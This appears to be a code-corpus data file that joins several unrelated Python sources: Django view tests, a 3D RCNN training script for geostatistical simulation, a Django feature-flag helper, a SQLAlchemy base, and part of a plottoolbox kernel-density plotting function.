request = self.client.get(url)
# Assert test
self.assertEqual(302, request.status_code)
class UserTableViews(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='ssss', email='<EMAIL>', password='<PASSWORD>')
self.fac = Faculty.objects.create()
self.dep = Department.objects.create(faculty=self.fac)
UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)
self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1)
self.topic.department.add(self.dep)
def test_page_load_on_get(self):
# Setup test
url = reverse('web_user_table')
request = self.client.login(username="ssss", password="<PASSWORD>")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/user_table.html')
def test_page_load_if_no_profile(self):
# Setup test
url = reverse('web_user_table')
another_user = User.objects.create_user(username='xxxss', email='<EMAIL>', password='<PASSWORD>')
request = self.client.login(username="xxxss", password="<PASSWORD>")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/user_table.html')
def test_post_when_no_choices(self):
# Setup test
url = reverse('web_user_table')
data = {}
request = self.client.login(username="xxxss", password="<PASSWORD>")
# Exercise test
request = self.client.post(url, data=data)
# Assert test
self.assertEqual(302, request.status_code)
| 2.390625 | 2 |
3D/Train_Module_3D.py | geometatqueens/RCNN | 1 | 1288 | """The present code is the Version 1.0 of the RCNN approach to perform MPS
in 3D for categorical variables. It has been developed by <NAME> and <NAME> in the
Geometallurygical Group at Queen's University as part of a PhD program.
The code is not free of bugs but running end-to-end.
Any comments and further improvements are well recevied to: <EMAIL>
April 16, 2019.
Geomet Group - Queen's University - Canada"""
# Do not display the AVX message about using GPU
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
#from tensorflow.python.client import device_lib
#print(device_lib.list_local_devices())
#os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
#os.environ["CUDA_VISIBLE_DEVICES"]="0"
## #########################
import numpy as np
import tensorflow as tf
import time
import External_Functions_3D as fns_nested
import gc
for ind0 in range(1):
start_time_AllTrain = time.time()
HyperPar = []
HyperPar.append(50) # SGsizex - Num 0
HyperPar.append(50) # SGsizey - Num 1
HyperPar.append(50) # SGsizez - Num 2
HyperPar.append(int(7)) # Search_x - Num 3
HyperPar.append(int(7)) # Search_y - Num 4
HyperPar.append(int(7)) # Search_z - Num 5
HyperPar.append(int(7)) # IPsizex - Num 6
HyperPar.append(int(7)) # IPsizey - Num 7
HyperPar.append(int(7)) # IPsizez - Num 8
HyperPar.append(50) # Percentage of Data Conditioning - Num 9 .. divided by 3 so 1% is 10 represents 1%
HyperPar.append(1) # MinDC - Num 10
HyperPar.append(1500) # Num Fully Connected - Num 11
HyperPar.append(3) # wdnh - Num 12
HyperPar.append(16) # convdepth - Num 13
HyperPar.append(2) # num of categories - Num 14
print("SG: ", int(HyperPar[3]),"x",int(HyperPar[4]),"x",int(HyperPar[5]), "IP: ", int(HyperPar[6]),"x",int(HyperPar[7]),"x",int(HyperPar[8]))
Ncicles = 500
Nepoch = 1
#Nbatch = 250
Nsamples = 512
TrainingImage = "TI_Collaboration_1of4_50x50x50_newRepresentation.dat"
LocModel = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))
#LocModel = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth/FeatMaps'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))
LocFile = 'Models/3D_NewRepresentation/Allperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))
#LocFile = 'Models/3D_NewRepresentation/New%sperc/%sx%sx%s_%sx%sx%s_4ConvNets_4HL_BN_3FC%s_ws%sx%sx%s_%sconvdepth'%(int(HyperPar[9]), int(HyperPar[3]),int(HyperPar[4]),int(HyperPar[5]), int(HyperPar[6]),int(HyperPar[7]),int(HyperPar[8]), int(HyperPar[11]), int(HyperPar[12]),int(HyperPar[12]),int(HyperPar[12]), int(HyperPar[13]))
print("[Graph]")
#fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D_NoBN(HyperPar=HyperPar, LocModel=LocModel)
fns_nested.CreateGraph_4ConvNets_4HL_NFeaConv_wdnhxwdnh_BN_3D(HyperPar=HyperPar, LocModel=LocModel)
# To save the TI
TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=3,Training=False, Padding=True)
TempSimGrid.SavePlot(name=LocModel+'_TI.png', Level=1)
MaxLR, MinLR = 0.01, 0.001
StepLR = 10
PointStart = 1
for indTrain in range(Ncicles):
#HyperPar[9] = np.random.randint(41)+10
cuos = indTrain%(2*StepLR)
if cuos < StepLR:
LearningRate = np.around(((MaxLR - MinLR)/StepLR)*cuos + MinLR, decimals=7)
else:
LearningRate = np.around(((MaxLR - MinLR)/StepLR)*(StepLR - cuos) + MaxLR, decimals=7)
start_time_1 = time.time()
print ("Cicle: {}".format(indTrain+PointStart), "Learning Rate: ", LearningRate)
TempSimGrid = fns_nested.Grid(HyperPar=HyperPar, DBname=TrainingImage, Lvl=5, Training=True, Padding=True)
print("[Sim]")
TempSimGrid.Simulate_4ConvNets_BN_3D(LocModel=LocModel, Cicle=(indTrain+PointStart), Plot=True)
print("[Saving Grid]")
TempSimGrid.SaveGrid(file="{}/TrainReas_{}.txt".format(LocFile, indTrain+PointStart))
print("[Train]")
TempSimGrid.Train_4ConvNets_BN_3D(Epochs=Nepoch, Num_samples=Nsamples, LocModel=LocModel, LR=LearningRate)
print("--%s seconds of whole training process-" % (np.around((time.time() - start_time_1), decimals=2)))
gc.collect()
print(" ")
print("--%s minutes of ALL training-" % ((time.time() - start_time_AllTrain)/60)) | 2.484375 | 2 |
feature_flags_project/feature_flags/providers.py | steuke/django_feature_flags_example | 0 | 1289 | import logging
from typing import Dict
from django.http import HttpRequest
logger = logging.getLogger(__name__)
class FeatureFlagProvider:
def is_feature_enabled(self, feature_name: str, user_id: str = None, attributes: Dict = None):
raise NotImplementedError("You must override FeatureFlagProvider.is_feature_enabled()")
def _attributes_from_request(request: HttpRequest) -> Dict:
if not request:
return dict()
attributes = dict()
try:
attributes["is_staff"] = request.user.is_staff
return attributes
except Exception:
logger.exception(
"Unexpected exception while trying to parse http-request for feature-attributes."
)
return dict()
def is_feature_enabled(feature_name: str, request: HttpRequest) -> bool:
from django.conf import settings
is_enabled = False
attributes = _attributes_from_request(request)
try:
is_enabled = settings.FEATURE_FLAG_PROVIDER.is_feature_enabled(
feature_name=feature_name, user_id="dontcare", attributes=attributes
)
logger.info(f"Feature '{feature_name}' is enabled={is_enabled}")
except Exception:
logger.exception(f"Exception while trying to check feature-flag state for '{feature_name}'")
return is_enabled
| 2.34375 | 2 |
src/app/database/__init__.py | roch1990/aiohttp-blog | 20 | 1290 | <gh_stars>10-100
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base() | 1.1875 | 1 |
src/plottoolbox/functions/kde.py | timcera/plottoolbox | 0 | 1291 | <filename>src/plottoolbox/functions/kde.py
# -*- coding: utf-8 -*-
"""Collection of functions for the manipulation of time series."""
from __future__ import absolute_import, division, print_function
import itertools
import os
import warnings
import mando
import numpy as np
import pandas as pd
from mando.rst_text_formatter import RSTHelpFormatter
from tstoolbox import tsutils
from .. import plotutils
warnings.filterwarnings("ignore")
@mando.command("kde", formatter_class=RSTHelpFormatter, doctype="numpy")
@tsutils.doc(plotutils.ldocstrings)
def kde_cli(
input_ts="-",
columns=None,
start_date=None,
end_date=None,
clean=False,
skiprows=None,
index_type="datetime",
names=None,
ofilename="plot.png",
xtitle="",
ytitle="",
title="",
figsize="10,6.0",
legend=None,
legend_names=None,
subplots=False,
sharex=True,
sharey=False,
colors="auto",
linestyles="auto",
markerstyles=" ",
bar_hatchstyles="auto",
style="auto",
logx=False,
logy=False,
xaxis="arithmetic",
yaxis="arithmetic",
xlim=None,
ylim=None,
secondary_y=False,
mark_right=True,
scatter_matrix_diagonal="kde",
bootstrap_size=50,
bootstrap_samples=500,
norm_xaxis=False,
norm_yaxis=False,
lognorm_xaxis=False,
lognorm_yaxis=False,
xy_match_line="",
grid=False,
label_rotation=None,
label_skip=1,
force_freq=None,
drawstyle="default",
por=False,
invert_xaxis=False,
invert_yaxis=False,
round_index=None,
plotting_position="weibull",
prob_plot_sort_values="descending",
source_units=None,
target_units=None,
lag_plot_lag=1,
plot_styles="bright",
hlines_y=None,
hlines_xmin=None,
hlines_xmax=None,
hlines_colors=None,
hlines_linestyles="-",
vlines_x=None,
vlines_ymin=None,
vlines_ymax=None,
vlines_colors=None,
vlines_linestyles="-",
):
r"""Kernel density estimation of probability density function.
"kde" will create a plot of estimation of the probability density function
based on the data called kernel density estimation (KDE).
{ydata}
Parameters
----------
{input_ts}
ofilename : str
[optional, defaults to 'plot.png']
Output filename for the plot. Extension defines
the type, for example 'filename.png' will create a PNG file.
If used within Python, and `ofilename` is None will return the
Matplotlib figure that can then be changed or added to as
needed.
lag_plot_lag
[optional, default to 1]
The lag used if ``type`` "lag_plot" is chosen.
xtitle : str
[optional, default depends on ``type``]
Title of x-axis.
ytitle : str
[optional, default depends on ``type``]
Title of y-axis.
title : str
[optional, defaults to '']
Title of chart.
figsize : str
[optional, defaults to '10,6.5']
The 'width,height' of plot in inches.
legend
[optional, defaults to True]
Whether to display the legend.
legend_names : str
[optional, defaults to None]
Legend would normally use the time-series names associated with
the input data. The 'legend_names' option allows you to
override the names in the data set. You must supply a comma
separated list of strings for each time-series in the data set.
subplots
[optional, defaults to False]
Make separate subplots for each time series.
sharex
[optional, default to True]
In case subplots=True, share x axis.
sharey
[optional, default to False]
In case subplots=True, share y axis.
colors
[optional, default is 'auto']
The default 'auto' will cycle through matplotlib colors in the chosen
style.
At the command line supply a comma separated matplotlib
color codes, or within Python a list of color code strings.
Can identify colors in four different ways.
1. Use 'CN' where N is a number from 0 to 9 that gets the Nth color
from the current style.
2. Single character code from the table below.
+------+---------+
| Code | Color |
+======+=========+
| b | blue |
+------+---------+
| g | green |
+------+---------+
| r | red |
+------+---------+
| c | cyan |
+------+---------+
| m | magenta |
+------+---------+
| y | yellow |
+------+---------+
| k | black |
+------+---------+
3. Number between 0 and 1 that represents the level of gray, where 0 is
white an 1 is black.
4. Any of the HTML color names.
+------------------+
| HTML Color Names |
+==================+
| red |
+------------------+
| burlywood |
+------------------+
| chartreuse |
+------------------+
| ...etc. |
+------------------+
Color reference:
http://matplotlib.org/api/colors_api.html
linestyles
[optional, default to 'auto']
If 'auto' will iterate through the available matplotlib line types.
Otherwise on the command line a comma separated list, or a list of
strings if using the Python API.
To not display lines use a space (' ') as the linestyle code.
Separated 'colors', 'linestyles', and 'markerstyles' instead of using
the 'style' keyword.
+---------+--------------+
| Code | Lines |
+=========+==============+
| ``-`` | solid |
+---------+--------------+
| -- | dashed |
+---------+--------------+
| -. | dash_dot |
+---------+--------------+
| : | dotted |
+---------+--------------+
| None | draw nothing |
+---------+--------------+
| ' ' | draw nothing |
+---------+--------------+
| '' | draw nothing |
+---------+--------------+
Line reference:
http://matplotlib.org/api/artist_api.html
markerstyles
[optional, default to ' ']
The default ' ' will not plot a marker. If 'auto' will iterate through
the available matplotlib marker types. Otherwise on the command line
a comma separated list, or a list of strings if using the Python API.
Separated 'colors', 'linestyles', and 'markerstyles' instead of using
the 'style' keyword.
+-------+----------------+
| Code | Markers |
+=======+================+
| . | point |
+-------+----------------+
| o | circle |
+-------+----------------+
| v | triangle down |
+-------+----------------+
| ^ | triangle up |
+-------+----------------+
| < | triangle left |
+-------+----------------+
| > | triangle right |
+-------+----------------+
| 1 | tri_down |
+-------+----------------+
| 2 | tri_up |
+-------+----------------+
| 3 | tri_left |
+-------+----------------+
| 4 | tri_right |
+-------+----------------+
| 8 | octagon |
+-------+----------------+
| s | square |
+-------+----------------+
| p | pentagon |
+-------+----------------+
| ``*`` | star |
+-------+----------------+
| h | hexagon1 |
+-------+----------------+
| H | hexagon2 |
+-------+----------------+
| ``+`` | plus |
+-------+----------------+
| x | x |
+-------+----------------+
| D | diamond |
+-------+----------------+
| d | thin diamond |
+-------+----------------+
| _ | hlines_y |
+-------+----------------+
| None | nothing |
+-------+----------------+
| ' ' | nothing |
+-------+----------------+
| '' | nothing |
+-------+----------------+
Marker reference:
http://matplotlib.org/api/markers_api.html
style
[optional, default is None]
Still available, but if None is replaced by 'colors', 'linestyles', and
'markerstyles' options. Currently the 'style' option will override the
others.
Comma separated matplotlib style strings per time-series. Just
combine codes in 'ColorMarkerLine' order, for example 'r*--' is
a red dashed line with star marker.
bar_hatchstyles
[optional, default to "auto", only used if type equal to "bar", "barh",
"bar_stacked", and "barh_stacked"]
If 'auto' will iterate through the available matplotlib hatch types.
Otherwise on the command line a comma separated list, or a list of
strings if using the Python API.
+-----------------+-------------------+
| bar_hatchstyles | Description |
+=================+===================+
| / | diagonal hatching |
+-----------------+-------------------+
| ``\`` | back diagonal |
+-----------------+-------------------+
| ``|`` | vertical |
+-----------------+-------------------+
| - | horizontal |
+-----------------+-------------------+
| + | crossed |
+-----------------+-------------------+
| x | crossed diagonal |
+-----------------+-------------------+
| o | small circle |
+-----------------+-------------------+
| O | large circle |
+-----------------+-------------------+
| . | dots |
+-----------------+-------------------+
| * | stars |
+-----------------+-------------------+
logx
DEPRECATED: use '--xaxis="log"' instead.
logy
DEPRECATED: use '--yaxis="log"' instead.
xlim
[optional, default is based on range of x values]
Comma separated lower and upper limits for the x-axis of the
plot. For example, '--xlim 1,1000' would limit the plot from
1 to 1000, where '--xlim ,1000' would base the lower limit on
the data and set the upper limit to 1000.
ylim
[optional, default is based on range of y values]
Comma separated lower and upper limits for the y-axis of the
plot. See `xlim` for examples.
xaxis : str
[optional, default is 'arithmetic']
Defines the type of the xaxis. One of 'arithmetic', 'log'.
yaxis : str
[optional, default is 'arithmetic']
Defines the type of the yaxis. One of 'arithmetic', 'log'.
secondary_y
[optional, default is False]
Whether to plot on the secondary y-axis. If a list/tuple, which
time-series to plot on secondary y-axis.
mark_right
[optional, default is True]
When using a secondary_y axis, should the legend label the axis of the
various time-series automatically.
scatter_matrix_diagonal : str
[optional, defaults to 'kde']
If plot type is 'scatter_matrix', this specifies the plot along the
diagonal. One of 'kde' for Kernel Density Estimation or 'hist'
for a histogram.
bootstrap_size : int
[optional, defaults to 50]
The size of the random subset for 'bootstrap' plot.
bootstrap_samples
[optional, defaults to 500]
The number of random subsets of 'bootstrap_size'.
norm_xaxis
DEPRECATED: use '--type="norm_xaxis"' instead.
norm_yaxis
DEPRECATED: use '--type="norm_yaxis"' instead.
lognorm_xaxis
DEPRECATED: use '--type="lognorm_xaxis"' instead.
lognorm_yaxis
DEPRECATED: use '--type="lognorm_yaxis"' instead.
xy_match_line : str
[optional, defaults is '']
Will add a match line where x == y. Set to a line style code.
grid
[optional, default is False]
Whether to plot grid lines on the major ticks.
label_rotation : int
[optional]
Rotation for major labels for bar plots.
label_skip : int
[optional]
Skip for major labels for bar plots.
drawstyle : str
[optional, default is 'default']
'default' connects the points with lines. The
steps variants produce step-plots. 'steps' is equivalent to 'steps-pre'
and is maintained for backward-compatibility.
ACCEPTS::
['default' | 'steps' | 'steps-pre' | 'steps-mid' | 'steps-post']
por
[optional]
Plot from first good value to last good value. Strips NANs
from beginning and end.
{force_freq}
invert_xaxis
[optional, default is False]
Invert the x-axis.
invert_yaxis
[optional, default is False]
Invert the y-axis.
plotting_position : str
[optional, default is 'weibull']
{plotting_position_table}
Only used for norm_xaxis, norm_yaxis, lognorm_xaxis,
lognorm_yaxis, weibull_xaxis, and weibull_yaxis.
prob_plot_sort_values : str
[optional, default is 'descending']
How to sort the values for the probability plots.
Only used for norm_xaxis, norm_yaxis, lognorm_xaxis,
lognorm_yaxis, weibull_xaxis, and weibull_yaxis.
{columns}
{start_date}
{end_date}
{clean}
{skiprows}
{index_type}
{names}
{source_units}
{target_units}
{round_index}
plot_styles: str
[optional, default is "default"]
Set the style of the plot. One or more of Matplotlib styles "classic",
"Solarize_Light2", "bmh", "dark_background", "fast", "fivethirtyeight",
"ggplot", "grayscale", "seaborn", "seaborn-bright",
"seaborn-colorblind", "seaborn-dark", "seaborn-dark-palette",
"seaborn-darkgrid", "seaborn-deep", "seaborn-muted",
"seaborn-notebook", "seaborn-paper", "seaborn-pastel",
"seaborn-poster", "seaborn-talk", "seaborn-ticks", "seaborn-white",
"seaborn-whitegrid", "tableau-colorblind10", and
SciencePlots styles "science", "grid", "ieee", "scatter", "notebook",
"high-vis", "bright", "vibrant", "muted", and "retro".
If multiple styles then each over rides some or all of the
characteristics of the previous.
Color Blind Appropriate Styles
The styles "seaborn-colorblind", "tableau-colorblind10", "bright",
"vibrant", and "muted" are all styles that are setup to be able to be
distinguished by someone with color blindness.
Black, White, and Gray Styles
The "ieee" style is appropriate for black, white, and gray, however the
"ieee" also will change the chart size to fit in a column of the "IEEE"
journal.
The "grayscale" is another style useful for photo-copyable black,
white, nd gray.
Matplotlib styles:
https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html
SciencePlots styles:
https://github.com/garrettj403/SciencePlots
hlines_y:
[optional, defaults to None]
Number or list of y values where to place a horizontal line.
hlines_xmin:
[optional, defaults to None]
List of minimum x values to start the horizontal line. If a list must
be same length as `hlines_y`. If a single number will be used as the
minimum x values for all horizontal lines. A missing value or None
will start at the minimum x value for the entire plot.
hlines_xmax:
[optional, defaults to None]
List of maximum x values to end each horizontal line. If a list must
be same length as `hlines_y`. If a single number will be the maximum
x value for all horizontal lines. A missing value or None will end at
the maximum x value for the entire plot.
hlines_colors:
[optional, defaults to None]
List of colors for the horizontal lines. If a single color then will
be used as the color for all horizontal lines. If a list must be same
length as `hlines_y`. If None will take from the color pallette in the
current plot style.
hlines_linestyles:
[optional, defaults to None]
List of linestyles for the horizontal lines. If a single linestyle
then will be used as the linestyle for all horizontal lines. If a list
must be same length as `hlines_y`. If None will take for the standard
linestyles list.
vlines_x:
[optional, defaults to None]
List of x values where to place a vertical line.
vlines_ymin:
[optional, defaults to None]
List of minimum y values to start the vertical line. If a list must be
same length as `vlines_x`. If a single number will be used as the
minimum x values for all vertical lines. A missing value or None will
start at the minimum x value for the entire plot.
vlines_ymax:
[optional, defaults to None]
List of maximum x values to end each vertical line. If a list must be
same length as `vlines_x`. If a single number will be the maximum
x value for all vertical lines. A missing value or None will end at
the maximum x value for the entire plot.
vlines_colors:
[optional, defaults to None]
List of colors for the vertical lines. If a single color then will be
used as the color for all vertical lines. If a list must be same
length as `vlines_x`. If None will take from the color pallette in the
current plot style.
vlines_linestyles:
[optional, defaults to None]
List of linestyles for the vertical lines. If a single linestyle then
will be used as the linestyle for all vertical lines. If a list must
be same length as `vlines_x`. If None will take for the standard
linestyles list.
"""
plt = kde(
input_ts=input_ts,
columns=columns,
start_date=start_date,
end_date=end_date,
clean=clean,
skiprows=skiprows,
index_type=index_type,
names=names,
ofilename=ofilename,
xtitle=xtitle,
ytitle=ytitle,
title=title,
figsize=figsize,
legend=legend,
legend_names=legend_names,
subplots=subplots,
sharex=sharex,
sharey=sharey,
colors=colors,
linestyles=linestyles,
markerstyles=markerstyles,
bar_hatchstyles=bar_hatchstyles,
style=style,
logx=logx,
logy=logy,
xaxis=xaxis,
yaxis=yaxis,
xlim=xlim,
ylim=ylim,
secondary_y=secondary_y,
mark_right=mark_right,
scatter_matrix_diagonal=scatter_matrix_diagonal,
bootstrap_size=bootstrap_size,
bootstrap_samples=bootstrap_samples,
norm_xaxis=norm_xaxis,
norm_yaxis=norm_yaxis,
lognorm_xaxis=lognorm_xaxis,
lognorm_yaxis=lognorm_yaxis,
xy_match_line=xy_match_line,
grid=grid,
label_rotation=label_rotation,
label_skip=label_skip,
force_freq=force_freq,
drawstyle=drawstyle,
por=por,
invert_xaxis=invert_xaxis,
invert_yaxis=invert_yaxis,
round_index=round_index,
plotting_position=plotting_position,
prob_plot_sort_values=prob_plot_sort_values,
source_units=source_units,
target_units=target_units,
lag_plot_lag=lag_plot_lag,
plot_styles=plot_styles,
hlines_y=hlines_y,
hlines_xmin=hlines_xmin,
hlines_xmax=hlines_xmax,
hlines_colors=hlines_colors,
hlines_linestyles=hlines_linestyles,
vlines_x=vlines_x,
vlines_ymin=vlines_ymin,
vlines_ymax=vlines_ymax,
vlines_colors=vlines_colors,
vlines_linestyles=vlines_linestyles,
)
# @tsutils.validator(
# ofilename=[str, ["pass", []], 1],
# type=[str, ["domain", ["kde",],], 1,],
# lag_plot_lag=[int, ["range", [1, None]], 1],
# xtitle=[str, ["pass", []], 1],
# ytitle=[str, ["pass", []], 1],
# title=[str, ["pass", []], 1],
# figsize=[float, ["range", [0, None]], 2],
# legend=[bool, ["domain", [True, False]], 1],
# legend_names=[str, ["pass", []], 1],
# subplots=[bool, ["domain", [True, False]], 1],
# sharex=[bool, ["domain", [True, False]], 1],
# sharey=[bool, ["domain", [True, False]], 1],
# colors=[str, ["pass", []], None],
# linestyles=[str, ["domain", ["auto", None, "", " ", " "] + plotutils.LINE_LIST], None],
# markerstyles=[str, ["domain", ["auto", None, "", " ", " "] + plotutils.MARKER_LIST], None],
# bar_hatchstyles=[str, ["domain", ["auto", None, "", " ", " "] + plotutils.HATCH_LIST], None],
# style=[str, ["pass", []], None],
# xlim=[float, ["pass", []], 2],
# ylim=[float, ["pass", []], 2],
# xaxis=[str, ["domain", ["arithmetic", "log"]], 1],
# yaxis=[str, ["domain", ["arithmetic", "log"]], 1],
# secondary_y=[bool, ["domain", [True, False]], 1],
# mark_right=[bool, ["domain", [True, False]], 1],
# scatter_matrix_diagonal=[str, ["domain", ["kde", "hist"]], 1],
# bootstrap_size=[int, ["range", [0, None]], 1],
# xy_match_line=[str, ["pass", []], 1],
# grid=[bool, ["domain", [True, False]], 1],
# label_rotation=[float, ["pass", []], 1],
# label_skip=[int, ["range", [1, None]], 1],
# drawstyle=[str, ["pass", []], 1],
# por=[bool, ["domain", [True, False]], 1],
# invert_xaxis=[bool, ["domain", [True, False]], 1],
# invert_yaxis=[bool, ["domain", [True, False]], 1],
# plotting_position=[
# str,
# [
# "domain",
# ["weibull", "benard", "tukey", "gumbel", "hazen", "cunnane", "california"],
# ],
# 1,
# ],
# prob_plot_sort_values=[str, ["domain", ["ascending", "descending"]], 1],
# plot_styles=[
# str,
# [
# "domain",
# [
# "classic",
# "Solarize_Light2",
# "bmh",
# "dark_background",
# "fast",
# "fivethirtyeight",
# "ggplot",
# "grayscale",
# "seaborn",
# "seaborn-bright",
# "seaborn-colorblind",
# "seaborn-dark",
# "seaborn-dark-palette",
# "seaborn-darkgrid",
# "seaborn-deep",
# "seaborn-muted",
# "seaborn-notebook",
# "seaborn-paper",
# "seaborn-pastel",
# "seaborn-poster",
# "seaborn-talk",
# "seaborn-ticks",
# "seaborn-white",
# "seaborn-whitegrid",
# "tableau-colorblind10",
# "science",
# "grid",
# "ieee",
# "scatter",
# "notebook",
# "high-vis",
# "bright",
# "vibrant",
# "muted",
# "retro",
# ],
# ],
# None,
# ],
# hlines_y=[float, ["pass", []], None],
# hlines_xmin=[float, ["pass", []], None],
# hlines_xmax=[float, ["pass", []], None],
# hlines_colors=[str, ["pass", []], None],
# hlines_linestyles=[
# str,
# ["domain", ["auto", None, "", " ", " "] + plotutils.LINE_LIST],
# None,
# ],
# vlines_x=[float, ["pass", []], None],
# vlines_ymin=[float, ["pass", []], None],
# vlines_ymax=[float, ["pass", []], None],
# vlines_colors=[str, ["pass", []], None],
# vlines_linestyles=[
# str,
# ["domain", ["auto", None, "", " ", " "] + plotutils.LINE_LIST],
# None,
# ],
# )
def kde(
input_ts="-",
columns=None,
start_date=None,
end_date=None,
clean=False,
skiprows=None,
index_type="datetime",
names=None,
ofilename="plot.png",
xtitle="",
ytitle="",
title="",
figsize="10,6.0",
legend=None,
legend_names=None,
subplots=False,
sharex=True,
sharey=False,
colors="auto",
linestyles="auto",
markerstyles=" ",
bar_hatchstyles="auto",
style="auto",
logx=False,
logy=False,
xaxis="arithmetic",
yaxis="arithmetic",
xlim=None,
ylim=None,
secondary_y=False,
mark_right=True,
scatter_matrix_diagonal="kde",
bootstrap_size=50,
bootstrap_samples=500,
norm_xaxis=False,
norm_yaxis=False,
lognorm_xaxis=False,
lognorm_yaxis=False,
xy_match_line="",
grid=False,
label_rotation=None,
label_skip=1,
force_freq=None,
drawstyle="default",
por=False,
invert_xaxis=False,
invert_yaxis=False,
round_index=None,
plotting_position="weibull",
prob_plot_sort_values="descending",
source_units=None,
target_units=None,
lag_plot_lag=1,
plot_styles="bright",
hlines_y=None,
hlines_xmin=None,
hlines_xmax=None,
hlines_colors=None,
hlines_linestyles="-",
vlines_x=None,
vlines_ymin=None,
vlines_ymax=None,
vlines_colors=None,
vlines_linestyles="-",
**kwds,
):
r"""Plot data."""
# Need to work around some old option defaults with the implementation of
# mando
legend = bool(legend == "" or legend == "True" or legend is None)
type = "kde"
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
from matplotlib.ticker import FixedLocator
tsd = tsutils.common_kwds(
input_ts,
skiprows=skiprows,
names=names,
index_type=index_type,
start_date=start_date,
end_date=end_date,
pick=columns,
round_index=round_index,
dropna="all",
source_units=source_units,
target_units=target_units,
clean=clean,
por=por,
)
tsd, lnames = plotutils.check(type, tsd, legend_names)
# This is to help pretty print the frequency
try:
try:
pltfreq = str(tsd.index.freq, "utf-8").lower()
except TypeError:
pltfreq = str(tsd.index.freq).lower()
if pltfreq.split(" ")[0][1:] == "1":
beginstr = 3
else:
beginstr = 1
if pltfreq == "none":
short_freq = ""
else:
# short freq string (day) OR (2 day)
short_freq = "({})".format(pltfreq[beginstr:-1])
except AttributeError:
short_freq = ""
if colors == "auto":
colors = None
else:
colors = tsutils.make_list(colors)
if linestyles == "auto":
linestyles = plotutils.LINE_LIST
else:
linestyles = tsutils.make_list(linestyles)
if bar_hatchstyles == "auto":
bar_hatchstyles = plotutils.HATCH_LIST
else:
bar_hatchstyles = tsutils.make_list(bar_hatchstyles)
if markerstyles == "auto":
markerstyles = plotutils.MARKER_LIST
else:
markerstyles = tsutils.make_list(markerstyles)
if markerstyles is None:
markerstyles = " "
if style != "auto":
nstyle = tsutils.make_list(style)
if len(nstyle) != len(tsd.columns):
raise ValueError(
tsutils.error_wrapper(
"""
You have to have the same number of style strings as time-series to plot.
You supplied '{}' for style which has {} style strings,
but you have {} time-series.
""".format(
style, len(nstyle), len(tsd.columns)
)
)
)
colors = []
markerstyles = []
linestyles = []
for st in nstyle:
colors.append(st[0])
if len(st) == 1:
markerstyles.append(" ")
linestyles.append("-")
continue
if st[1] in plotutils.MARKER_LIST:
markerstyles.append(st[1])
try:
linestyles.append(st[2:])
except IndexError:
linestyles.append(" ")
else:
markerstyles.append(" ")
linestyles.append(st[1:])
if linestyles is None:
linestyles = [" "]
else:
linestyles = [" " if i in [" ", None] else i for i in linestyles]
markerstyles = [" " if i is None else i for i in markerstyles]
if colors is not None:
icolors = itertools.cycle(colors)
else:
icolors = None
imarkerstyles = itertools.cycle(markerstyles)
ilinestyles = itertools.cycle(linestyles)
# Only for bar, barh, bar_stacked, and barh_stacked.
ibar_hatchstyles = itertools.cycle(bar_hatchstyles)
if (
logx is True
or logy is True
or norm_xaxis is True
or norm_yaxis is True
or lognorm_xaxis is True
or lognorm_yaxis is True
):
warnings.warn(
"""
*
* The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and
* --lognorm_yaxis options are deprecated.
*
* For --logx use --xaxis="log"
* For --logy use --yaxis="log"
* For --norm_xaxis use --type="norm_xaxis"
* For --norm_yaxis use --type="norm_yaxis"
* For --lognorm_xaxis use --type="lognorm_xaxis"
* For --lognorm_yaxis use --type="lognorm_yaxis"
*
"""
)
if xaxis == "log":
logx = True
if yaxis == "log":
logy = True
xlim = plotutils.know_your_limits(xlim, axis=xaxis)
ylim = plotutils.know_your_limits(ylim, axis=yaxis)
plot_styles = tsutils.make_list(plot_styles) + ["no-latex"]
style_loc = os.path.join(
os.path.dirname(__file__), os.pardir, "SciencePlots_styles"
)
plot_styles = [
os.path.join(style_loc, i + ".mplstyle")
if os.path.exists(os.path.join(style_loc, i + ".mplstyle"))
else i
for i in plot_styles
]
plt.style.use(plot_styles)
figsize = tsutils.make_list(figsize, n=2)
_, ax = plt.subplots(figsize=figsize)
if type in ["kde", "probability_density"]:
ax = tsd.plot.kde(
legend=legend,
subplots=subplots,
sharex=sharex,
sharey=sharey,
style=None,
logx=logx,
logy=logy,
xlim=xlim,
ylim=ylim,
secondary_y=secondary_y,
figsize=figsize,
)
for index, line in enumerate(ax.lines):
if icolors is not None:
c = next(icolors)
else:
c = None
if imarkerstyles is not None:
m = next(imarkerstyles)
else:
m = None
if ilinestyles is not None:
l = next(ilinestyles)
else:
l = None
if c is not None:
